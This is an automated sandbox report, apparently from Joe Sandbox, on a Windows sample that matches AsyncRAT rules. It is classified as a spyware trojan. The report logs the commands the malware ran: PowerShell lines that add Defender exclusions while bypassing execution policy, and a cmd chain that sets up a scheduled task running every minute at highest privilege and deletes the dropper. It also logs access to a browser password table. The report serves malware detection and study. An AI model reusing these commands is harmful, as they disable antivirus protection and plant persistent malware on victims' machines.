                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C063A5025_2_6C063A50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C06966025_2_6C069660
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C06C72B25_2_6C06C72B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C06EB4025_2_6C06EB40
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C062F6325_2_6C062F63
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09EC8325_2_6C09EC83
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BAD6025_2_6C0BAD60
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09E83825_2_6C09E838
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CEA5025_2_6C0CEA50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09EAA025_2_6C09EAA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0EEB2025_2_6C0EEB20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09EB4325_2_6C09EB43
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DA64725_2_6C0DA647
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09E04025_2_6C09E040
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09C26025_2_6C09C260
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E3CE025_2_6C0E3CE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09B91225_2_6C09B912
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E596025_2_6C0E5960
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A998425_2_6C0A9984
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ED9C025_2_6C0ED9C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DFAA225_2_6C0DFAA2
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09B03725_2_6C09B037
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A928025_2_6C0A9280
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FACF025_2_6C1FACF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C344D3025_2_6C344D30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DCD9D25_2_6C1DCD9D
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ACD8025_2_6C1ACD80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C192DA025_2_6C192DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184E0225_2_6C184E02
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184E4B25_2_6C184E4B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEE4025_2_6C1DEE40
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184E8125_2_6C184E81
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184ECC25_2_6C184ECC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEEE025_2_6C1CEEE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184F3725_2_6C184F37
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEF7025_2_6C1CEF70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FCF7025_2_6C1FCF70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ECF9025_2_6C1ECF90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AAF8025_2_6C2AAF80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEFAB25_2_6C1CEFAB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F0FE025_2_6C1F0FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F883025_2_6C1F8830
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E085525_2_6C1E0855
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CC8B025_2_6C1CC8B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1868E725_2_6C1868E7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C890025_2_6C1C8900
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CC94C25_2_6C1CC94C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1849FB25_2_6C1849FB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DCA1025_2_6C1DCA10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184A2625_2_6C184A26
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E2A5025_2_6C1E2A50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FAA8025_2_6C1FAA80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184AA025_2_6C184AA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FAAEC25_2_6C1FAAEC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C8B1B25_2_6C1C8B1B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18EB0025_2_6C18EB00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2A2B1025_2_6C2A2B10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C188B9025_2_6C188B90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DABB025_2_6C1DABB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C182BA025_2_6C182BA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FABC025_2_6C1FABC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C188BC725_2_6C188BC7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18443925_2_6C184439
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E4B025_2_6C18E4B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D055025_2_6C1D0550
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18456825_2_6C184568
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18656C25_2_6C18656C
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll 3F08728C7A67E4998FBDC7A7CB556D8158EFDCDAF0ACF75B7789DCCACE55662D
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll 91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                Source: yt7dW9nyJK.exeStatic PE information: invalid certificate
                Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000000.2037582727.0000000000190000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexsUpf.exe2 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.000000000060E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2070321293.0000000004C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000416000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: yt7dW9nyJK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ffmaba.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ffmaba.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.csBase64 encoded string: 'MOSjuEXWGCeuUSbv59lDTULs6LFzvYBZH41XkH9yEnDH7YwG5FS0lU64qKjFIPxSZpHgdykYYHkwwAPCb9a5', 'z927ITnSLvRzj6sT0oOQMfxrxePFr4FY7CtHEfOCy3RNRV9CrFoM012BQrHryb3GaEBoxMvKfSq55HIioVkW', 'wkAWgkm9Hq2LUhSApfaGA28Wew5QwxbHuJWGf6GqJHYPfZVOezyZbbLKPk6wOm1dBzMzGxUgIqOhoYfFklgz', 'QCnV4dACN1BDItDwaUKx14Lp3DW9zGfceYG8TrMw92CYFgR9mSa5y4aJCRbCkT4RWuTPN9eptSbPkdWF4emv', 'MllONkDpSW15sVE95prffePmO6NzN5kLSBPsHqqXjtJa0cqfAZPPVSgTl6hiIS6jrBigR4aGyDWPAIVGnr3a', 'yuyROimEtBGgmCQLmPtckzOCDnB9dYPpwiT2g6yI2X6LzGEvML1LQE1j6DMuKhcGFTnnBxQSrJkQfv1YL8Wq', 'kNuuvkCHSOJumFXu0kJYwCQsNlifJrPhlp5sVGzV4GfncK7B4kSPQ8aFEyXg7WBxQEXrlasbdDQ6PUcOFIvq', 'i3ahtLaj6i8OccGnyo30tks0QcCQVfj0XTjILBXzogkUW46MUl8BLmYoEYDoNp7oExTWWK5DEmsVsd9hPteI', 'qGJs5j7hUjde1Dbk7Ahg9thP3jkBeHBp25FT1k0irlmFNPYP04ljLjVxUksZSizkITDnct1IVqHtQYS64iPB', 'kyGILSjU2WVbQG2s46RJTpZOOXbYZoHnzpbY5gRsq1FNEmtlyfU6KaEnt7FXE5WS17Kf4v4XRCi0PJfcZsLl', 'lu2uXyYJbcwZGZyhkXgB2Si3cRdthfqYlNM6gKCqvvVF4GgOto46VKPTwkBwyKlw8R7jntyNEImcMKrrQ3gJ', 'jObCmCT5ZWuaGkeSVM47Z1ErEm2oe5O8QZ9UVIhdWoJWyaSJciGLGwMxlwD8wNwyQsKyizcmNjpHJZZGgWDs', 'SpE7me7kN6nXKVa0rJQsWYcK0UnI8MxzDRWUfMV1TjSEHWT6hi5UDvTs71HVgtmnIJdol37UDfgEGa6dGYwV'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.csBase64 encoded string: 'MOSjuEXWGCeuUSbv59lDTULs6LFzvYBZH41XkH9yEnDH7YwG5FS0lU64qKjFIPxSZpHgdykYYHkwwAPCb9a5', 'z927ITnSLvRzj6sT0oOQMfxrxePFr4FY7CtHEfOCy3RNRV9CrFoM012BQrHryb3GaEBoxMvKfSq55HIioVkW', 'wkAWgkm9Hq2LUhSApfaGA28Wew5QwxbHuJWGf6GqJHYPfZVOezyZbbLKPk6wOm1dBzMzGxUgIqOhoYfFklgz', 'QCnV4dACN1BDItDwaUKx14Lp3DW9zGfceYG8TrMw92CYFgR9mSa5y4aJCRbCkT4RWuTPN9eptSbPkdWF4emv', 'MllONkDpSW15sVE95prffePmO6NzN5kLSBPsHqqXjtJa0cqfAZPPVSgTl6hiIS6jrBigR4aGyDWPAIVGnr3a', 'yuyROimEtBGgmCQLmPtckzOCDnB9dYPpwiT2g6yI2X6LzGEvML1LQE1j6DMuKhcGFTnnBxQSrJkQfv1YL8Wq', 'kNuuvkCHSOJumFXu0kJYwCQsNlifJrPhlp5sVGzV4GfncK7B4kSPQ8aFEyXg7WBxQEXrlasbdDQ6PUcOFIvq', 'i3ahtLaj6i8OccGnyo30tks0QcCQVfj0XTjILBXzogkUW46MUl8BLmYoEYDoNp7oExTWWK5DEmsVsd9hPteI', 'qGJs5j7hUjde1Dbk7Ahg9thP3jkBeHBp25FT1k0irlmFNPYP04ljLjVxUksZSizkITDnct1IVqHtQYS64iPB', 'kyGILSjU2WVbQG2s46RJTpZOOXbYZoHnzpbY5gRsq1FNEmtlyfU6KaEnt7FXE5WS17Kf4v4XRCi0PJfcZsLl', 'lu2uXyYJbcwZGZyhkXgB2Si3cRdthfqYlNM6gKCqvvVF4GgOto46VKPTwkBwyKlw8R7jntyNEImcMKrrQ3gJ', 'jObCmCT5ZWuaGkeSVM47Z1ErEm2oe5O8QZ9UVIhdWoJWyaSJciGLGwMxlwD8wNwyQsKyizcmNjpHJZZGgWDs', 'SpE7me7kN6nXKVa0rJQsWYcK0UnI8MxzDRWUfMV1TjSEHWT6hi5UDvTs71HVgtmnIJdol37UDfgEGa6dGYwV'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, uU2UPPwPJLQsRsHPyp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, uU2UPPwPJLQsRsHPyp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, uU2UPPwPJLQsRsHPyp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@67/78@7/14
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yt7dW9nyJK.exe.logJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMutant created: \Sessions\1\BaseNamedObjects\SXVvkYHBJwlTYefsyEntPmgFop
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeMutant created: \Sessions\1\BaseNamedObjects\dkm6mrq0hw
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMutant created: \Sessions\1\BaseNamedObjects\kAU1GvVR3izXMfie
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzwpiuff.jmv.ps1Jump to behavior
                Source: yt7dW9nyJK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: yt7dW9nyJK.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: yt7dW9nyJK.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
